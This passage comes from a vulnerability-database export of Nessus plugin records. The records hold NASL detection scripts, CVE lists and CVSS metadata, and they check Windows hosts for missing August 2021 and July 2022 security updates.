https://support.microsoft.com/en-us/topic/august-10-2021-kb5005033-os-builds-19041-1165-19042-1165-and-19043-1165-b4c77d08-435a-4833-b9f7-e092372079a4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?526975a8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005033.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-08';\nvar kbs = make_list(\n '5005033'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19041,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n||\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19042,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n||\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19043,\n rollup_date:'08_2021',\n bulletin:bulletin,\n 
rollup_kb_list:[5005033])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005030.NASL", "href": "https://www.tenable.com/plugins/nessus/152435", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152435);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005030\");\n script_xref(name:\"MSFT\", value:\"MS21-5005030\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005030-os-build-17763-2114-cec503ed-cc09-4641-bdc1-988153e0bd9a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34b43ea5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005030.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005030'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:17763,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005030])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": 
"NONE"}}, {"lastseen": "2023-05-23T15:01:41", "description": "The remote Windows host is missing security update 5015870 or cumulative update 5015866. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226). 
\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015870: Windows Server 2008 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22043", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015870.NASL", "href": "https://www.tenable.com/plugins/nessus/163051", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163051);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22034\",\n \"CVE-2022-22037\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22043\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30213\",\n \"CVE-2022-30220\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015866\");\n script_xref(name:\"MSKB\", value:\"5015870\");\n script_xref(name:\"MSFT\", value:\"MS22-5015866\");\n script_xref(name:\"MSFT\", value:\"MS22-5015870\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015870: Windows Server 2008 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015870 or \ncumulative update 5015866. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034,\n CVE-2022-22036, CVE-2022-22037, CVE-2022-22041,\n CVE-2022-22047, CVE-2022-22049, CVE-2022-22050,\n CVE-2022-30202, CVE-2022-30205, CVE-2022-30206,\n CVE-2022-30209, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226). \n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015866\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015870\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015866\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015870\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015870 or Cumulative Update 5015866\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22037\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-22026\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015870',\n '5015866'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0',\n sp:2,\n rollup_date:'07_2022',\n 
bulletin:bulletin,\n rollup_kb_list:[5015870, 5015866])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T10:27:45", "description": "The remote Windows host is missing security update 5015875 or cumulative update 5015863. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015875: Windows Server 2012 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015875.NASL", "href": "https://www.tenable.com/plugins/nessus/163043", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163043);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30213\",\n \"CVE-2022-30220\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015863\");\n script_xref(name:\"MSKB\", value:\"5015875\");\n script_xref(name:\"MSFT\", value:\"MS22-5015863\");\n script_xref(name:\"MSFT\", value:\"MS22-5015875\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015875: Windows Server 2012 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015875 or \ncumulative update 5015863. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. 
An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034,\n CVE-2022-22036, CVE-2022-22037, CVE-2022-22041,\n CVE-2022-22047, CVE-2022-22049, CVE-2022-22050,\n CVE-2022-30202, CVE-2022-30205, CVE-2022-30206,\n CVE-2022-30209, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015863\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015875\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015863\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015875\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015875 or Cumulative Update 5015863\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22041\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-22026\");\n\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015875',\n '5015863'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2',\n sp:0,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015875, 5015863])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": 